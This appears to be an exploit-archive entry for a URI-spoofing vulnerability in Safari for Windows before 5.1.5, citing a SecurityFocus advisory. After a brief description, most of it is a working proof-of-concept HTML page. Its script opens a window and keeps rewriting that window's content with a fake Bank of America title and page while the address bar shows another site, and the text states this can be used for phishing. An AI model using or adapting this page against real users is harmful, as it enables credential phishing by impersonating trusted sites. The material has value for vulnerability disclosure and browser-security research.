source: https://www.securityfocus.com/bid/52746/info

Apple Safari for Windows is affected by a URI-spoofing vulnerability.

An attacker may leverage this issue to spoof the source URI of a site presented to an unsuspecting user. This may lead to a false sense of trust because the user may be presented with a source URI of a trusted site while interacting with the attacker's malicious site.

Versions prior to Apple Safari 5.1.5 on Windows systems are vulnerable. 

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.example.com/TR/html4/loose.dtd"> <html> <head> <title>Safari for windows 5.1.5 and prior URL spoof window.open() test case.</title> <script type="text/javascript"> var wx; function invokePoC() { wx = open("http://www:example.com/login","newwin"); setInterval("doit()",1); } function doit() { wx.document.open(); wx.document.write("<title>Bank of America | Home | Personal</title><body><img src='data:image/gif;base64,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'/><h1></b>Hello !! i'm a Spoofed Site !!!</b></h1></body>"); } </script> </head> <body onload="invokePoC()"> <h1>Safari for windows 5.1.5 and prior URL pseudo-spoof window.open() test case.</h1> <noscript><p>this testcase requires JavaScript to run.</p></noscript> <p>First Click in this link ==> <a href="http://www.example.com/login" onClick="location.reload();" target="_blank">invoke PoC</a></p> <p>and Look in result window, the address bar , show The url and if you write any url in the address bar, the browser can't navigate to it. This issue can be used to spoof sites or pishing attacks. Vulnerable Safari for windows 5.1.5 and prior versions, also Safari for IOS is Too vulnerable. </body> </html>